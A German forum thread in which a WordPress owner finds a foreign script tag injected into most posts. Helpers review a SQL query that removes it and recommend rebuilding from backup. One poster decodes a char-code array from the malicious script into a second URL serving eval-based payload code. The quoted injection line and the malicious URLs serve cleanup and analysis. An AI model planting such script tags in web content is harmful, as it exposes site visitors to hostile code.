SQL Was ist hotopponents.site/site.js?

[Overkee]

Hallo zusammen,
aufgrund von Problemen mit meiner Wordpress-Installation musste ich mich mal wieder in meine Datenbank einloggen. Das eigentliche Problem konnte ich lösen, doch als ich mich da so umgesehen habe, sind mir merkwürdige Einträge aufgefallen in fast allen Beiträgen.

Sehr oft finde ich dort die Zeile:

<script src='https://hotopponents.site/site.js' type='text/javascript'></script>

Was ist das? Mir ist das absolut unbekannt...

Laut dem einzig sinnvollen Google Treffer dazu hat das was mit einem Hack zu tun? https://stackoverflow.com/questions...en-trying-to-find-and-replace-javascript-with

Da ich kein SQL Profi bin, würde ich mich über Hilfe freuen die Einträge wieder loszuwerden. Ist der Befehl der im Beitrag von Stackoverflow steht dazu geeignet? Würde ungern noch mehr kaputt machen

SELECT `post_content`, REPLACE(`post_content`, '<script src=''https://hotopponents.site/site.js'' type=''text/javascript''></script>', ''), COUNT(*) FROM `db709131568`.`wp_posts` WHERE `post_content` LIKE '%<script src=''https://hotopponents.site/site.js'' type=''text/javascript''></script>%' COLLATE utf8_bin GROUP BY `post_content` ORDER BY `post_content` ASC

 

[azereus]

bis auf den datenbanknamen der nicht zu deinem passen wird siehts mal gut aus
kannst dir ja ein backup der datenbank erstellen
und die einträge mit einem "texteditor" suchen und ersetzen
danach wieder einspielen

 

[Dalek]

Als erstes solltest du die Lücke durch die die Hacker reingekommen sind flicken, ansonsten ist die Seite nächste Woche wieder gehackt. Bei Wordpress ist am wahrscheinlichsten das ein plugin oder theme unsicher ist.

An sich sollte man das System nach so einem Hack als kompromittiert ansehen, komplett neu aufsetzen und aus einem Backup vor dem Hack wiederherstellen. Es ist fast unmöglich alle möglichen Hintertüren aufzuspüren die die Hacker hinterlassen haben könnten.

 

[Overkee]

Dann freue ich mich ja schon jetzt auf das nächste Wochenende

Aber da scheint wirklich noch mehr zu sein. Habe mal alle Plug-ins bis auf Jetpack deaktiviert und uMatrix blockt immer noch zwei mir fremde URLs

Der Eintrag für hotopponents.site ist aber immerhin verschwunden

 

[azereus]

dann such in der DB nach dem string der domain

 

[Overkee]

Anders als hotopponents lassen sich die anderen beiden Seiten dort nirgends finden. Ich werde am Wochenende die Seite neu einrichten. Lästige Arbeit, aber wahrscheinlich am gründlichsten.

 

[mastaqz]

Anders als hotopponents lassen sich die anderen beiden Seiten dort nirgends finden. Ich werde am Wochenende die Seite neu einrichten. Lästige Arbeit, aber wahrscheinlich am gründlichsten.

Doch, die lassen sich finden, in dem JS File "hotopponents.site/site.js"

const nums = [104, 116, 116, 112, 115, 58, 47, 47, 119, 119, 119, 46, 108, 101, 97, 114, 110, 105, 110, 103, 116, 111, 111, 108, 107, 105, 116, 46, 99, 108, 117, 98, 47, 108, 105, 110, 107, 46, 112, 104, 112];

console.log(String.fromCharCode(...nums));
// https://www.learningtoolkit.club/link.php

Geht man auf diese Seite (nicht empfohlen mit aktiviertem JavaScript),
gibt es eine JavaScript Datei, die per eval diese Charcodes umwandelt und dir bisschen Müll unterjubelt.

Alles in allem:
- Wordpress platt machen, Backup einspielen
- so wenig wie möglich Plugins/Themes installieren, v.a. keine veralteten
- alles immer aktuell halten
- IMMER Backups haben, Wordpress ist durch seine weite Verbreitung ein sehr beliebtes Angriffsziel